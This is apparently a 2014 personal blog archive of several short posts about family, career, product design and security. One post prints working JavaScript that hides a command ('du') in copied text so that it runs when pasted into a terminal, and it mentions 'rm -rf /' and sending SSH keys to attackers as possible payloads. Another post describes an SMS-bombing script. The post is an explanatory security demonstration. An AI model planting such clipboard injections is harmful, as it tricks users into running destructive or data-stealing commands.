End of Session 2014
Author: jgamblin
Last night I sent an email to a good friend and his boss passing on an amazing career opportunity that paid an ungodly amount of money.
It was basically Scrooge McDuck build a money bin money.
So why didn’t I take it? After a lot of thinking and discussion with my wife it boiled down to timing and location.
We weren’t crazy about the location. We would have had to relocate to Atlanta. We dont have more than a handful of friends in Atlanta and our nearest relatives would be about 300 miles away. I dont like grits.
The timing wasn’t great either. My son is getting ready to start Kindergarten next month. My wife has a job that she loves. Our family is a half hour drive away. We have amazing friends. We love our church. I dont like grits.
Even after that list of cons It was still amazingly hard to say no to a great career opportunity and the possibility of my own money bin.
So why did I?
I remember seeing this quote a few months ago:
“Half of the troubles of this life can be traced to saying yes too quickly and not saying no enough.” – Josh Billings
So I took my time and thought about it. On Monday I was ready to call a Realtor and put my house and the market. On Tuesday I was trying to figure out if I was going to sound cool with a southern accent. On Wednesday I woke up and realized it wasn’t the right time to move our family half way across the country.
So yesterday I wrote an email apologizing and declining the position, put in a 16 hour day at my current job and went home and slept like a baby.
It will be hard not owning a Tesla and having a bin full of money to swim around in but I know I made the right choice for my family and hopefully there will be other opportunities like this in the future.

This afternoon a “hacker” decided to text bomb my phone with about 1000 text messages asking me to paypal him $100 to stop.
A couple of things:
- I don’t negotiate with terrorists. (I always wanted to say that.).
- Part of the text bomb gave me information on how it was happening.
After getting a couple of messages I noticed they were all coming from onlinetextmessage.com. After looking at their web page I noticed that you could block messages from their site to your phone.
Once I blocked the attack I was interested in how they did it and started to do a little bit of research.
I am about to give you a link to a script that can do bad things. Please dont do bad things.
With a few well placed Google searches (onlinetextmessage.com sms bomb) I found this pastebin with a two year old perl script in it. I am “researching” here so I had to test out the script myself (against my own phone) and surprisingly it works really well.
After looking at a couple of other online SMS sending website it appears the reason that onlinetextmessage.com is vulnerable to this abuse is because they dont ask for a capatcha before sending the message. This would seem to be a pretty easy addition to their code to stop this from happening. I have sent them a nice email asking this to make these changes. I doubt I ever hear from them.
Meet the Capello Sleep & Charge Dual Alarm Clock with Night Light sold exclusively by Target.

It works fairly adequate as a:
- USB Charging Station
- Alarm Clock
- Radio
- Night Light(?)
Why I hate it is this button right here:

This “DST” button is .25" away from the snooze button, .2" away from the source and sleep timer button.
Why is this a big deal? Because when you accidentally touch the button it magically makes it an hour earlier in my bedroom than in the rest of the world. For a feature that will save me 30 seconds two times a year they have basically put a self destruct button right on top of their product.
How in the world do products like this make it to the market?
I was having a conversation about security today with a good friend and the subject came up of what is the most difficult question in security to answer?
After a few minutes of back and we fourth we settled on the following question:
Who would want to hack us?
This question is nearly always asked with the person asking it implying they aren’t important enough to be hacked.
As security professionals we mostly do a terrible job at answering this question. Normally we end up answering with something vague like “hackers”.
 (This is what a hacker looks like.)
(This is what a hacker looks like.)
When we answer back with a vague answer like “hackers” we dont make the threat real to the person asking the question. They will care and think about hackers as much as they do the nebulous bad guy who might break into their car and steal their 3 Doors Down CD.
The best way I have found to answer this question is by asking a question back.
Here are a few questions I always try to ask back when someone asks me who would want to hack us?
Have you ever had an employee leave on bad terms?
Have you ever made a competitor mad? 
Is there anyone that would enjoy you having negative publicity?
Everyone can think of an answer to one of these questions and it plants a mental image of someone who would actually want to do their company harm and not a guy with a ski mask.
How do you answer the question: Who would want to hack us?

I am going to whack the ball the over the fence.
That was my four year olds response when I reminded him that his first T-Ball game was later that day as I woke him up. I love my son but he spent 80% of his first and only T-Ball practice trying to make the other kids on his team laugh. He is no Jose Abreu.
My first instinct was to tell him:
Logically the chances of you hitting the ball over the fence are not very realistic, why don’t we concentrate on a single and hustling to first base?
As I sit on his bed getting ready to tell him why he isn’t going to hit a home run he tells me:
I can’t wait for my game tonight, it is going to be a so much fun!
At that moment my 4 year old reminded me that baseball it isn’t as much fun if you aren’t swinging for the fences. The same can be said about life. I can hit singles and hustle to first all day but wouldn’t it be a lot more fun to swing for the fences?
Even if you dont hit a home run you might even end up on 3rd base talking to your friend.

This morning I was out running some errands and NPR had an interview with a David Sklansky a poker player who wrote a book called “The Theory Of Poker” and he said the most important thing to remember about poker is that:
Poker Is Fundamentally A Battle Of Mistakes
That quote stuck with me all day and when I got some time to sit down and Google it tonight I found this amazing excerpt from his book:
Every time you play a hand differently from the way you would have played it if you could see all your opponents’ cards, they gain; and every time you play your hand the same way you would have played it if you could see all their cards, they lose.
Lets make this about security:
Every time you secure your network differently from the way you would have if you could see all your opponents’ attacks, they gain; and every time you secure your network the same way you would have if you could see all their attacks, they lose.
Poker players spend just as much time while at the table thinking about who they are playing than what they are playing. Security professionals on the other hand spend a lot of time and a lot of money trying to prevent attacks that people attacking their networks wont or cant use. I know small companies who are more worried about APT’s than they are of phishing attacks because they watched a 60 minutes story about it.
Can you answer these five questions about the people who would likely attack your network:
Who would want to attack my network? 
Why are they attacking my network?
What do they want to steal or change?
Is it possible for them to access the information they want to steal?
If I were them how would I try to steal the information?
I think if you can answer those five questions you would be off to a good start on understanding the correct way to secure your network because:
Security Is Fundamentally A Battle Of Mistakes.
I have a mentor who sends me a motivational quote a couple of times a week and today he dropped this on me:
If you’re the smartest person in the room, then you need to find another room.
I have heard that quote before and actually used it in an opening slide of a talk to make a self deprecating joke. I get the underlaying meaning of the quote but I think few people would actually admit to thinking that they are the smartest person in the room.
So either the person who wrote this quote was an egomaniac or wasn’t clear in his writing. Here is what I think he is talking about:

I have an amazing four year old at home who challenges me all the time by asking me questions I don’t know the answer to (Why are bananas yellow?) and asking me questions that make me think about life (Why do we have a house and my friend lives in an apartment?).
To be honest a lot of time I turn into this guy:

One thing my son does everyday is challenges me to think and learn. So after thinking about that quote for a little bit I responded with this:
If you’re in a room with people who don’t challenge you, then you need to find another room.
Are you being challenged in your personal and professional life or is it time to find another room?
Earlier today I was reading this article on Rollingstone.com about how FXX plans to show all 552 episodes of The Simpson’s this August and noticed when I copied anything from the website it appends a link and copyright notice. That got me thinking about what else could be appended to copied text and how bad guys could use.
So after a little looking around I found this JavaScript that will append text to anything copied. To test my theory out I setup a secondary tumblr account called badcopypaste.tumblr.com and added this javascript to the head of the document:
javascript<script type=“text/javascript”>
function addLink() {
var body_element = document.getElementsByTagName(‘body’)[0];
var selection;
selection = window.getSelection();
var pagelink = “<br></br> du <br></br> ; // change this if you want
var copytext = selection + pagelink;
var newdiv = document.createElement(‘div’);
newdiv.style.position=’absolute’;
newdiv.style.left=’-99999px’;
body_element.appendChild(newdiv);
newdiv.innerHTML = copytext;
selection.selectAllChildren(newdiv);
window.setTimeout(function() {
body_element.removeChild(newdiv);
},0);
}
document.oncopy = addLink;
</script>
and posted this post:

When you copy and paste the echo $PATH command in Firefox and Chrome you get this:
echo $PATH
du
If you copy and paste directly into a terminal window you get this:
In the javascript I added a non-malicious DU command as an example. You cant see it until you already pasted it and it could just as easily been rm -rf / or a command to SCP all your SSH keys to "The Bad Guys™”.
That is why it is always a good idea to paste all commands into a notepad and not directly into a terminal and a dumb idea to let javascript add information to your clipboard.
The Missouri Capitol in Spring